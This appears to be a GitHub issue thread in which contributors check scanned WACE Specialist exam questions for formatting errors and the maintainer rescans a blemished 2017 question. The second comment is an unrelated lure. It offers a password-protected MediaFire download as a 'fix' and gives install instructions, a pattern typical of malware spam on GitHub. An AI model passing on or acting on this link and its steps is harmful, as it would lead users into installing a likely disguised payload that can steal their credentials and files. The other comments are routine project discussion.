### ISSUE TITLE
Possible Incorrectly Scanned Questions

### ISSUE THREAD

**Issue by GrimReaper2654** [GrimReaper2654/WACE-Database#25]
Some of the spec questions between 2020 and 2017 may have formatting errors due to unforeseen problems in the script. Would be kinda nice if somebody could check and list any problems here.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by RJDJcool3** [comment]
I am checking the questions as they appear on the website, I will let you know on my progress
2016 appears to be fine

**Comment by RJDJcool3** [comment]
I am checking through all the Specialist Questions right now, so far I have observed a strange bar underneath Q4 of 2017, ideally it should be rescanned

I will check the rest of the questions to see if anymore have been affected

![image](https://github.com/user-attachments/assets/7c0fb0b9-ed49-47f6-9478-4fab2a62ca0d)

**Comment by RJDJcool3** [comment]
List of Questions with Blemishes/Errors: (will be updated)
- Q4 Calc Free 2017

**Comment by GrimReaper2654** [comment]
and its fixed

**Comment by RJDJcool3** [comment]
@GrimReaper2654 Q4 still has the blemish, if you are using a program to scan it, it may be best to do a manual scan for this question.

**Comment by GrimReaper2654** [comment]
Now it should be fixed
![Screenshot 2024-08-29 at 11 25 37 am](https://github.com/user-attachments/assets/43f4eff9-22aa-4594-b24b-e4d1a43f12ed)
